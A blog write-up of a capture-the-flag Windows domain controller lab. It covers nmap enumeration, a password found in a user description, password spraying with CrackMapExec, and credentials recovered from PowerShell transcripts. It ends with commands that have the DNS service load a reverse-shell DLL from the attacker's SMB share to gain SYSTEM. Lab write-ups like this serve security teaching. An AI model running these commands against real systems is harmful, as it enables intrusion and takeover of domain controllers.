Raffaele Sabato

Interested in Offensive Security, Apple Security, Malwares and Reverse Engineering.

2 minute read

I had some problems the last week and couldn’t publish this writeup I wrote in Decembre, let’s start by enumerating all the service on the machine with a TCP scan:

root@kali:~# nmap -T4 -sS 10.10.10.169 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 06:56 EDT
Nmap scan report for 10.10.10.169
Host is up (0.056s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49687/tcp open  unknown
49709/tcp open  unknown
49873/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 38.71 seconds

Using enum4linux, we find a lot of users:

Screenshot

There is an interesting Description for the user Marko, it seems that the Administrator have put the user password in the description. Using the credenziali marko:Welcome123! We are not able to log in smb:

root@kali:~# smbclient -L \\10.10.10.169 -U marko
Enter WORKGROUP\marko's password: 
session setup failed: NT_STATUS_LOGON_FAILURE

We can try to save all the users in a file and then use the same password for all of them. For this purpose, I used Crack Map Exec.

Screenshot

And yes, we have an access for the user melanie. Using evil-winrm, we can open a powershell sessione on the machine.

Screenshot

After some enumeration, we can find a hidden directory PSTranscripts in C:.

Screenshot

Inside the subdirectory 20191203 there is a txt file:

Screenshot

The file contains the password for the user ryan:

Screenshot

Root Flag

With evilwinrm, we can access as ryan. The user ryan, is member of the group “MEGABANK\DnsAdmins”. There is a famous privilege escalation when an user is member of DnsAdmins, the attack is described here. We need to create our custom DLL, we can use msfvenom to create a reverse shell in a DLL file:

Screenshot

Then, we can use Impacket to run a smb server to share our custom DDL:

Screenshot

Inject our custom DLL and stop and run again the dns service with the following command:

dnscmd Resolute /config /serverlevelplugindll \\10.10.14.27\SYRION\syrion.dll
sc.exe \\Resolute stop dns
sc.exe \\Resolute start dns

Screenshot

And we get a reverse shell with System privilege:

Screenshot

Screenshot

You may also enjoy

macOS

CVE-2024-34456: Trend Micro Antivirus One Dylib Injection

During a red teaming activity, we gained access to a company MacBook; the Trend Micro Antivirus One software was runn...

06 May 2024

6 minute read

Malware

Gold Pickaxe iOS Technical Analysis: IPA Overview and C2 Communication Start up

In February 2024 Group-IB wrote a blog post about a mobile Trojan developed by a Chinese-speaking cybercrimine group ...

19 Apr 2024

14 minute read

Malware

Atomic macOS Stealer (AMOS) Analysis

Hello everybody, this is my first macOS malware analysis, I took a sample from malwarebazaar and tried to reverse it,...

08 Mar 2024

11 minute read

Malware

Rustware Part 3: Dynamic API resolution (Windows)

In the previous blog post we have seen how to perform a shellcode process injection by finding a target process PID u...

20 Nov 2023

12 minute read